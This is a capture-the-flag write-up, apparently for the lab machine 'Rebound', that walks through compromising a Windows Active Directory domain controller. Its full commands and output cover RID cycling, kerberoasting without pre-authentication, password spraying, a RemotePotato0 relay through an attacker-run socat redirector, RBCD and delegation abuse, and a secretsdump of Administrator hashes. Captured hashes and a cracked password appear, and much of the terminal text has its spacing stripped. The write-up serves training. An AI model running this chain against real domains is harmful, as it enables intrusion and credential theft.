A Windows Machine which comprises of a multitude of AD vulnerabilities.
Enumeration
โโโ(kaliใฟkali)-[~/Desktop/CTF/Boxes/Rebound]โโ$sudonmap-sC-sV-Pn10.10.11.231[sudo] password for kali: StartingNmap7.94 ( https://nmap.org ) at 2023-12-23 23:27 ESTNmapscanreportforrebound.htb (10.10.11.231)Hostisup (0.053s latency).Notshown:989closedtcpports (reset)PORTSTATESERVICEVERSION53/tcpopendomainSimpleDNSPlus88/tcpopenkerberos-secMicrosoftWindowsKerberos (server time:2023-12-2411:27:38Z)135/tcpopenmsrpcMicrosoftWindowsRPC139/tcpopennetbios-ssnMicrosoftWindowsnetbios-ssn389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|ssl-cert:Subject:|SubjectAlternativeName:DNS:dc01.rebound.htb|Notvalidbefore:2023-08-25T22:48:10|_Notvalidafter:2024-08-24T22:48:10|_ssl-date:2023-12-24T11:28:26+00:00; +7h00m01sfromscannertime.445/tcpopenmicrosoft-ds?464/tcpopenkpasswd5?593/tcpopenncacn_httpMicrosoftWindowsRPCoverHTTP1.0636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date:2023-12-24T11:28:27+00:00; +7h00m01sfromscannertime.|ssl-cert:Subject:|SubjectAlternativeName:DNS:dc01.rebound.htb|Notvalidbefore:2023-08-25T22:48:10|_Notvalidafter:2024-08-24T22:48:103268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|ssl-cert:Subject:|SubjectAlternativeName:DNS:dc01.rebound.htb|Notvalidbefore:2023-08-25T22:48:10|_Notvalidafter:2024-08-24T22:48:10|_ssl-date:2023-12-24T11:28:26+00:00; +7h00m01sfromscannertime.3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|ssl-cert:Subject:|SubjectAlternativeName:DNS:dc01.rebound.htb|Notvalidbefore:2023-08-25T22:48:10|_Notvalidafter:2024-08-24T22:48:10|_ssl-date:2023-12-24T11:28:27+00:00; +7h00m01sfromscannertime.ServiceInfo:Host:DC01; OS:Windows; CPE:cpe:/o:microsoft:windowsHostscriptresults:|smb2-security-mode:|3:1:1:|_Messagesigningenabledandrequired|_clock-skew:mean:7h00m00s,deviation:0s,median:7h00m00s|smb2-time:|date:2023-12-24T11:28:20|_start_date:N/AServicedetectionperformed.Pleasereportanyincorrectresultsathttps://nmap.org/submit/.Nmapdone:1IPaddress (1 hostup) scanned in 57.41 seconds
Enumerating SMB and LDAP yielded me nothing. But i was able to connect to SMB unauthenticated without perms using rpcclient so i proceeded with enumerating potential users with rid cycling.
kali)-[~/Desktop/CTF/Windows Stuff]โโ$crackmapexecsmb10.10.11.231-u"Guest"-p''SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB10.10.11.231445DC01 [+] rebound.htb\Guest:โโโ(kaliใฟkali)-[~/Desktop/CTF/Windows Stuff]โโ$ridenum10.10.11.231020000Guest''[*] Attempting lsaquery first...This will enumerate the base domain SID[*] Successfully enumerated base domain SID. Printing information: DomainName:reboundDomainSid:S-1-5-21-4078382237-1492182817-2568127209[*] Moving on to extract via RID cycling attack.. [*] Enumerating user accounts.. This could take a little while.Accountname:rebound\AdministratorAccountname:rebound\GuestAccountname:rebound\krbtgtAccountname:rebound\DC01$Accountname:rebound\ppaulAccountname:rebound\lluneAccountname:rebound\fflockAccountname:rebound\jjonesAccountname:rebound\mmaloneAccountname:rebound\nnoonAccountname:rebound\ldap_monitorAccountname:rebound\oorendAccountname:rebound\winrm_svcAccountname:rebound\batch_runnerAccountname:rebound\tbradyAccountname:rebound\delegator$[*] RIDENUM has finished enumerating user accounts...
I then tried AS-REP roasting hoping for some quick wins for initial access but could not crack the hash which probbaly meant this was not intended.
โโโ(kaliใฟkali)-[~/Desktop/CTF/Boxes/Rebound]โโ$impacket-GetNPUsers-dc-ip10.10.11.231-request-formathashcat-usersfileusers.txtrebound.htb/Impacketv0.11.0-Copyright2023Fortra$krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb587387c2d53bf69a0c$f3b60b15f622dbbde4153402b6320449e99e574a4f5c691fe415cec470cb8f52c3d4d3ae1d2c0029b23f7cab1751aaa493cf48c63c93358774333705ee62c827d33ee30503a81955ae1105ba4532d106c8ec07611af9c23b3d43a57f12c92f9cac5cb1c13a0f3576dde3fa29b2e1e484c227e615ea196a9fef98a31c552767e2b73892228cf77e55607adc1fb82712d39537f5c88db47c8e12c1d713789de07c6f561d5a86f0cbecf54c9e7232355c8af83c69aa60fc54915019b7e965496a5b15fa6dbfc45a9df367033a9233bf20a64b7aa8356fc300f9c906cef1c308b33a58c01057f3b332638f1b
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
After a very long time, I then stumbled across this article, talking about kerberoasting without pre-authentication. Similar to AS-REP roasting, the exploit leverages two things which we all have.
To keep myself sane from all the impacket branch errors i was receiving, i decided to use a Windows VM and perform the exploit using Rubeus and the /nopreauth parameter.
PS C:\Users\nicholas\Desktop > ./Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"rebound.htb" /dc:"DC01.rebound.htb" /nopreauth:"jjones" /spns:C:\Users\nicholas\Desktop\users.txt
_______ (_____ \ ||_____) )_ _||____________|__/||||_ \| ___||||/___)||\ \| |_|||_) ) ____||_||___||_||_|____/|____/|_____)____/(___/v2.3.1[*] Action: Kerberoasting[*] Using jjones without pre-auth to request service tickets[*] Target SPN : Administrator[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : Guest[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : krbtgt[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt[*] Target SPN : DC01$[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt[*] Target SPN : ppaul[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : llune[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : fflock[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : jjones[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : mmalone[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : nnoon[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : ldap_monitor[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt[*] Target SPN : oorend[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : winrm_svc[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : batch_runner[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : tbrady[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Target SPN : delegator$[*] Using domain controller: DC01.rebound.htb (10.10.11.231)[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt[*] Roasted hashes written to : C:\Users\nicholas\Desktop\kerberoastables.txtCommandoVM01/19/202404:32:31
We can now try to crack these hashes using hashcat and rockyou giving us the password of ldap_monitor.
After obtaining domain credentials, I then proceeded to map the domain using bloodhound and managed to see route for lateral movement to obtain user access but not with the users we have on hand.
From the graph above, our main goal is either to
Obtain either PPAUL or FFLOCK user account OR
Enroll ourselves as a group member of SERVICEMGMT somehow
Obtain either PPAUL or FFLOCK user account
Using the existing password obtained from ldap_monitor's account, i performed password spraying using crackmapexec and managed to get a match on the user oorend .
Sadly, the password spraying did not work on both PPAUL and FFLOCK.
Enroll ourselves as a group member of SERVICEMGMT somehow
I then remembered some ACLs permissions are not explicitly shown in bloodhound and must be explicitly enumerated using something like PowerView's FindDomainObjectAcl. However I kept recieving the error Server not operational.
I then struggled to find a Linux alternative till i finally stumbled across impacket's dacledit which essentially allows me to enumerate whether the principal oorend has any permissions over the target SERVICEMGMT group.
From here, we can utilize RemotePotato0 which allows us to get the ntlm hash of any user logged in on the target machine which in this case is tbrady.
โโโ(kaliใฟkali)-[~/Desktop/CTF/Boxes/Rebound]โโ$sudosocat-vTCP-LISTEN:135,fork,reuseaddrTCP:10.10.11.231:9999PSC:\Users\winrm_svc\Documents>.\RemotePotato0.exe-m2-x10.10.16.17-p9999-s1[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (nul
l) to your victim machine on port 9999[*] Example Network redirector:sudosocat-vTCP-LISTEN:135,fork,reuseaddrTCP:{{ThisMachineIp}}:9999[*] Starting the RPC server to capture the credentials hash from the user authentication!![*] Spawning COM object in the session: 1[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}[*] RPC relay server listening on port 9997 ...[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...[*] IStoragetrigger written: 104 bytes[*] ServerAlive2 RPC Call[*] ResolveOxid2 RPC call[+] Received the relayed authentication on the RPC relay server on port 9997[*] Connected to RPC Server 127.0.0.1 on port 9999[+] User hash stolen!NTLMv2Client:DC01NTLMv2Username:rebound\tbradyNTLMv2 Hash : tbrady::rebound:25cb25d078aa7cda:5d015a1e05ab333b0fc68d64bd26e5c7:01010000000000004c7bf203dc4bda0194875567cf8b3e9e0000000002000e00720
0650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e
0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008004c7bf203dc4bda0106000400060000000800300030000000000000000100000000200
000dec4cf9ef2d2a48c6c2af0bea86ea62183c13f07d827c4a1ebcfecd25e1a2f800a00100000000000000000000000000000000000090000000000000000000000
Cracking with rockyou, we get the password 543BOMBOMBUNmanda .
Looking back at bloodhound, we see that user tbrady has ReadGMSAPassword over DELEGATOR$.
The name of the account suggests exploiting something regarding delegations. To enumerate the delegation properties of the DELEGATOR$ account, we need to use PoweView's GetNetComputer and filter the properties.
We see that $DELEGATOR has the msds-allowedtodelegateto property for the service http/dc01.rebound.htb.
However, from our bloodhound output, Administrator user cannot be delegated.
With reference to this, RBCD (Resource-based Constrained Delegation) can be used to bypass this.
To perform this attack, we need two things which we already have.
A account with SPN - ldap_monitor user fiits the requirement
An account with the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object OR
Using impacket's RBCD, we can exploit this by appending value of ldap_monitor to msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DELEGATOR$.
โโโ(kaliใฟkali)-[~/Desktop/CTF/Boxes/Rebound]โโ$ impacket-rbcd 'rebound.htb/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass
Impacketv0.10.0-Copyright2022SecureAuthCorporation[*] Accounts allowed to act on behalf of other identity:[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy[*] Not modifying the delegation rights.[*] Accounts allowed to act on behalf of other identity:[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
We can now obtain a ticket via delegation operation.
Once the ticket is obtained, it can be used in a S4U2proxy request, made by DELEGATOR$, on behalf of the impersonated user, to obtain access to one of the services DELEGATOR$ can delegate to.
โโ(kaliใฟkali)-[~/Desktop/CTF/Boxes/Rebound]โโ$ impacket-getST -spn "http/dc01.rebound.htb" -impersonate "dc01$" -additional-ticket "dc01$.ccache" "rebound.htb/delegator$" -hashes aad3b435b51404eeaad3b435b51404ee:177ae2598e4f659488b6cd0a237df1fc -k -no-pass -dc-ip 10.10.11.231
Impacketv0.10.0-Copyright2022SecureAuthCorporation[*] Getting TGT for user[*] Impersonating dc01$[*] Using additional ticket dc01$.ccache instead of S4U2Self[*] Requesting S4U2Proxy[*] Saving ticket in dc01$.ccache
Finally, we can get the Administrator hash via secretsdump.
โโ(kaliใฟkali)-[~/Desktop/CTF/Boxes/Rebound]โโ$impacket-secretsdump-kdc01.rebound.htb-just-dc-useradministrator-dc-ip10.10.11.231-debugImpacketv0.11.0-Copyright2023Fortra[+] Impacket Library Installation Path: /home/kali/.pyenv/versions/3.9.16/lib/python3.9/site-packages/impacket[+] Using Kerberos Cache: dc01$.ccache[+] Domain retrieved from CCache: rebound.htb[+] SPN CIFS/DC01.REBOUND.HTB@REBOUND.HTB not found in cache[+] AnySPN is True, looking for another suitable SPN[+] Returning cached credential for HTTP/DC01.REBOUND.HTB@REBOUND.HTB[+] Using TGS from cache[+] Changing sname from http/dc01.rebound.htb@REBOUND.HTB to CIFS/DC01.REBOUND.HTB@REBOUND.HTB and hoping for the best[+] Username retrieved from CCache: dc01$[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)[*] Using the DRSUAPI method to get NTDS.DIT secrets[+] Calling DRSCrackNames for administrator [+] Calling DRSGetNCChanges for {37857665-6e2e-4f12-9976-5c9babcd8282}[+] Entering NTDSHashes.__decryptHash[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=rebound,DC=htbAdministrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::[+] Leaving NTDSHashes.__decryptHash[+] Entering NTDSHashes.__decryptSupplementalInfo[+] Leaving NTDSHashes.__decryptSupplementalInfo[+] Finished processing and printing user's hashes, now printing supplemental information[*] Kerberos keys grabbedAdministrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431fAdministrator:des-cbc-md5:ad8ac2a825fe1080[*] Cleaning up...